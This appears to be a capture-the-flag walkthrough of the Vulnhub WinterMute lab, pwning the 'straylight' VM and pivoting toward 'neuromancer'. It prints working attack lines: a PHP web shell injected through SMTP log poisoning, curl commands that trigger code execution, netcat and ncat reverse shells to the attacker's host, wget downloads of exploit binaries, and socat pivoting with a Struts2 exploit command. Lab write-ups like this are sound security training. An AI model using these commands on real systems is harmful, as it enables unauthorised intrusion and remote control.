Vulnhub - WinterMute writeup
This is going to be a very cool machine because it’s two VMs named
neuromancer and we need to pwn
straylight which is basically a
user machine and then from there we have to pivot to the another
wget http://192.168.56.1:8000/libhax.so; wget http://192.168.56.1:8000/rootshell
We can see the smtp server running. The interesting one is port
3000 which is running
hadoop-datanode , a service I’ve seen for the first time on any VM.
Let’s start with HTTP and see what we can find.
This is what we get when we visit the website and after sometime this changes and we are shown our so called
contract with the AI named
If we go through source of that(
xwx.html) page we’ll find the
js file which basically prints the contract.
I ran gobuster on that to see if I could find anything
/manual would lead us to
Apache manual so I decided to look into the
But I found nothing over there, nothing in source, nothing with gobuster. So I moved on to port
When we visit
http://192.168.56.102:3000 we are redirected to
http://192.168.56.102:3000/lua/login.lua?referer=/ and we get a login page.
We can see the
Hint saying the credentials are
admin: admin. After login we can see
flows section we can see the traffic flow.
Another thing we notice here is directory listing in the
info tab. We’ve already visited
/freeside and has found nothing. Let’s try
/turing-bolo on port
If we submit the query for case we can see other files listed there..
So this could mean that there might be directory traversal. So I tried
../ but none of them worked. After lot of trial and error I realized that in nmap scan we saw a
smtp service running but there wasn’t any pop3 or imap this could mean that
smtp is there just to send something out and if that is happening then there has to be log on the system.
I found the
logs for mail in
Since we have access to log we can exploit this to get an RCE using smtp server. We can send the
PHP code in the email and then try to access the log(
Using telnet connect to the port 25 and run the following one by one:
MAIL FROM:<email@example.com> RCPT TO:<?php echo system($_POST['cmd']); ?>
To test if our poisioning worked or not run the following command:
➜ curl -X POST http://192.168.56.102/turing-bolo/bolo.php\?bolo\=/var/log/mail --data "cmd=ls"
We can see the directory listing and since we got RCE we can get a reverse shell from this.
➜ curl -X POST http://192.168.56.102/turing-bolo/bolo.php\?bolo\=/var/log/mail --data "cmd=nc -e /bin/sh 192.168.56.1 4444"
Since we have the reverse shell we can start enumerating for privilege escalation.
I ran my enumerations scirpt and found few other user and a SUID
Since we have an SUID I decided to search for exploit and actually found one for privilege escalation.
I knew this exploit because same privilege escalation method was use in DC5 VM, so I did what I did in DC5 machine(read it here it’s toward the end).
After running the exploit I got the root shell.
Okay so we’ve got the root flag for straylight now it’s time to get root on neuromancer.
I read the note in
It gives us a URL
/struts2_18.104.22.168-showcase but this will not work on the IP we already have. Since the server is running via tomcat we’ll have to find out a way to do port scan without nmap(nmap is not installed on the server).
Also before that we need to find the IP on which
neuromancer is running. To do that we use simple bash commands:
for ip in $(seq 1 254); do ping -c 1 192.168.56.$ip; done
This might take some time
The only packet that wasn’t lost was to the IP
192.168.56.107. So this mean neuromancer is running on that IP. Now let’s port scan(without nmap).
for i in $(seq 1 65535); do nc -nvz -w 1 192.168.56.107 $i 2>&1; done | grep -v "Connection refused"
Okay so there are three open port
34483 but the problem is we won’t be able to see anything if we try to visit the IP and the ports. To be able to acces them we’ll have to do port forwarding. For portforwarding we can use
socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:8080, this means that the website on 8080 should be visible at port 5000 from outside. But since we need to do with three ports we’ll have to put
& in the end of each command.
& in nix tells the system to execute a command and put it in background.
In short we’ll be executing the following commands.
socat TCP-LISTEN:8009,fork,reuseaddr tcp:192.168.56.107:8009 &
socat TCP-LISTEN:8000,fork,reuseaddr tcp:192.168.56.107:8080 &
socat TCP-LISTEN:34483,fork,reuseaddr tcp:192.168.56.107:34483 &
Now before opening them in browser let’s run nmap on them to see what services are running.
HTTP - Port 8080
But this is not we want. In the note it said to visit
On visiting that page we can see
Struts2 Showcase welcome page.
I first looked around to see if I could find anything in there but I didn’t. So I searched for the exploit related to
Struts2 and found an RCE.
In the end of the exploit we’ll find 2 comments:
# $ ncat -v -l -p 4444 & # $ python exploit_S2-048.py http://127.0.0.1:8080/22.214.171.124-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
1st line is for setting up the listener and 2nd shows how to run exploit. But in our case we’ll need something more, we need another socat port forwarding.
Because we need reverse shell from
our machine but
starylight is the middle man. So we’ll need to forward everything to us.
To do this run the following command on
socat TCP-LISTEN:1337,fork,reuseaddr TCP:192.168.56.1:1337 &
This is for our reverse shell.